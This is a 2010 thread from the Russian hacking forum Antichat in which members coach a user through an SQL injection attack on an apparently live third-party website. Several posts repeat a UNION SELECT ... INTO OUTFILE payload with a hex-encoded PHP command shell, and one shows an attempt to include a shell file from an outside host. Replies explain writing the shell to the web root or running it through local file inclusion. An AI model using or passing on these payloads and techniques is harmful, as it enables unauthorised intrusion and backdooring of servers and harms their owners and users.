Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
19.05.2010, 09:24
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от GOGA075
пробовал так
и
cmd=include($_GET['http://site.ru/downloads/shell.txt']);
нефига не работают!!
меня одного смутило? 
|
|
|
19.05.2010, 22:11
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Сообщение от Iceangel_
да
@@datadir
прочитать этот файл через load_file
P.S. Я на все твои вопросы ответил, ответь на 1 мой. Сколько нужно курить, чтобы составить этот запрос?
Спасибо..
Посидел почитал ... понял что за бред написал ( Буду курить менче  )
Воспользовался советами :
Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись
Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам
6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+
На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига
Решил попробовать пойти другим путем:
union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+
здесь тодзе вопрос, ww.site.com/????? (нужна cmd)
Народ я хоть в правильном направление двигаюсь ?
Последний раз редактировалось Saiga; 19.05.2010 в 22:14..
|
|
|
|
19.05.2010, 22:22
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557
Репутация:
606
|
|
Сообщение от Saiga
Спасибо..
Посидел почитал ... понял что за бред написал ( Буду курить менче )
Воспользовался советами :
Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись
Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам
6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+
На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига
Решил попробовать пойти другим путем:
union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+
здесь тодзе вопрос, ww.site.com/????? (нужна cmd)
Народ я хоть в правильном направление двигаюсь ?
в веб-директорию сайта заливать нужно.
|
|
|
|
19.05.2010, 22:23
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214
Репутация:
3171
|
|
Сообщение от Saiga
Спасибо..
Посидел почитал ... понял что за бред написал ( Буду курить менче )
Воспользовался советами :
Чтобы не париться отвечу что в /var/lib/mysql/ipw18/www/ нельзя делать запись
Попробовал залить в категорию :/var/lib/mysql/ipw18/
следующим образам
6+union+select+0x3c3f7068702073797374656d28245f474 5545b5c27636d645c275d293b203f3e+into+outfile+'/var/lib/mysql/ipw18/2.php'+--+
На что мне ругнулся сайт, значит всё норм ....
теперь не могу догнать как его прочесть ?
пробовал www.site.com/2.php?cmd=dir .. но нифига
Решил попробовать пойти другим путем:
union+select+0x3c3f7068702073797374656d28245f47455 45b5c27636d645c275d293b203f3e+into+outfile+'/tmp/2.php'+--+
здесь тодзе вопрос, ww.site.com/????? (нужна cmd)
Народ я хоть в правильном направление двигаюсь ? /tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.
|
|
|
|
19.05.2010, 23:54
|
|
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337
Репутация:
3486
|
|
Сообщение от .Slip
Сообщение от pinch
Microsoft JET Database Engine error '80040e14'
значит бд у нас Microsoft JET Database. следовательно запросы передаются на низком уровне. =(((
Можно поподробнее про передачу запросов на низком уровне? Спасибо.
Поднимаю свой вопрос. Не могу спокойно спать, всё время думаю о низкоуровневых запросах.
|
|
|
|
20.05.2010, 00:04
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
.Slip
кажется я что то нашел,но не уверен 
http://www.citforum.ru/database/cache/gateway/
Последний раз редактировалось Konqi; 20.05.2010 в 00:24..
|
|
|
|
20.05.2010, 00:26
|
|
Познающий
Регистрация: 22.07.2008
Сообщений: 49
Провел на форуме:
170912
Репутация:
-4
|
|
Сообщение от m0Hze
/tmp/ - директория не доступная с веба.
Если льете в нее, то необходим lfi, что-бы этот файл проинклудить и выполнить.
Насчет www.site.com/2.php?cmd=dir, а файл то создался? Если файл создался, но выполнения команд нету, то скорее всего, вы залили неверное содержимое.
Спс
в /var/lib/mysql/ipw18/www/ нельзя делать запись.
(Can't create/write to file '/var/lib/mysql/ipw18/www/2.php' (Errcode: 2)
По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять )
Куда еще можна залить шелл кроме как ('site/www') или ('tmp')
Для меня это тёмный лес покачто, если есть статья то поделитесь люди добрые (link) 
|
|
|
|
20.05.2010, 00:27
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Saiga
По поводу local file include..
где можна с этим ознакомится .. в googl.ru ничего покачто не нашел (что мог бы переварит и понять ) http://forum.antichat.ru/nextnewesttothread30606.html
https://forum.antichat.net/showthread.php?p=188561
|
|
|
|
20.05.2010, 00:28
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Про лфи - это ко мне, дооо. Просто пока ми изучаю низкоуровневые MSSQL inj
|
|
|
|
20.05.2010, 00:34
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857
Репутация:
504
|
|
там низкоуровневые запросы в SQL. "ну ты понел" (с)
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
